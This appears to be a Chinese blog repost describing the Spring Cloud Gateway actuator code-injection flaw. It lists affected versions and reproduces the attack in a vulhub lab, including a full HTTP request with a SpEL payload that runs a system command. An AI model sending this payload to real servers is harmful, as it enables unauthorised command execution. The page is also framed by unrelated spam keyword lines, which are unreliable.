91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SpringCloud?Gateway遠程命令執行漏洞源碼分析

發布時間:2023-03-16 16:13:14 來源:億速云 閱讀:177 作者:iii 欄目:開發技術

這篇文章主要講解了“SpringCloud Gateway遠程命令執行漏洞源碼分析”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“SpringCloud Gateway遠程命令執行漏洞源碼分析”吧!

漏洞描述

使用Spring Cloud Gateway的應用程序在Actuator端點啟用、公開和不安全的情況下容易受到代碼注入的攻擊。攻擊者可以惡意創建允許在遠程主機上執行任意遠程執行的請求。

當攻擊者可以訪問actuator API時,就可以利用該漏洞執行任意命令。

影響范圍

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本

環境搭建

漏洞環境搭建,采用vulhub,搭建方法,自行搜索。

搭建成功后,訪問一下

SpringCloud?Gateway遠程命令執行漏洞源碼分析

漏洞復現

1.查看actuator端點是開啟的

抓包,并修改接口為/actuator

SpringCloud?Gateway遠程命令執行漏洞源碼分析

2. 查看/actuator/gateway/routes

SpringCloud?Gateway遠程命令執行漏洞源碼分析

返回的路由信息,意思是當訪問index時,路由到http://example.com:80

3.創建路由

POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.10.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 431

{
    "id": "test",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "cmd"
            }
        }
    ],
    "uri": "http://example.com:80",
    "order": 0
}

SpringCloud?Gateway遠程命令執行漏洞源碼分析

4.刷新路由

SpringCloud?Gateway遠程命令執行漏洞源碼分析

5.訪問創建的路由

SpringCloud?Gateway遠程命令執行漏洞源碼分析

6.刪除路由

SpringCloud?Gateway遠程命令執行漏洞源碼分析

7.再次刷新路由

SpringCloud?Gateway遠程命令執行漏洞源碼分析

8.然后,訪問該路由,發現路由已被刪除

SpringCloud?Gateway遠程命令執行漏洞源碼分析

感謝各位的閱讀,以上就是“SpringCloud Gateway遠程命令執行漏洞源碼分析”的內容了,經過本文的學習后,相信大家對SpringCloud Gateway遠程命令執行漏洞源碼分析這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關知識點的文章,歡迎關注!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

青铜峡市| 丹寨县| 兴和县| 长武县| 鹤庆县| 平舆县| 浮山县| 韶关市| 双鸭山市| 鄂温| 张家界市| 宜兴市| 武强县| 海丰县| 行唐县| 胶州市| 邛崃市| 寿阳县| 浦江县| 大理市| 沭阳县| 东莞市| 大埔县| 天津市| 合山市| 公安县| 南昌市| 米易县| 枣阳市| 呼玛县| 永清县| 历史| 彝良县| 仁寿县| 偃师市| 塔河县| 长武县| 如东县| 弥勒县| 孙吴县| 衡东县|